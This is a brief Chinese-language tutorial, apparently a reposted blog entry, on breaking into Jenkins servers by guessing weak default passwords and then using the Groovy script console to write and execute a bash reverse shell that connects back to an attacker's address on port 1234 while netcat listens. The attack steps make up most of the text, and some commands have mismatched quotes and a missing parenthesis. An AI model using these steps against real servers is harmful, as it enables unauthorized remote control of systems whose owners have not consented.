本文主要是介绍web中间件漏洞-Jenkins漏洞-弱口令、反弹shell,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
web中间件漏洞-Jenkins漏洞-弱口令、反弹shell
Jenkins弱口令
默认用户一般为jenkins/jenkins
使用admin/admin123登陆成功
Jenkins反弹shell
格式为 println"命令".execute().text
在/tmp目录中生成shell.sh文件,并向其中写入反弹shell的语句
new File(“/tmp/shell.sh”).write(‘bash -i >& /dev/tcp/192.168.1.3/1234 0>&1’
println “ls-al/tmp/shell.sh”.execute().text
攻击机nc监听1234端口,使用sh命令执行服务器上的脚本进行反弹shell,println"sh/tmp/shell.sh".execute().text
这篇关于web中间件漏洞-Jenkins漏洞-弱口令、反弹shell的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!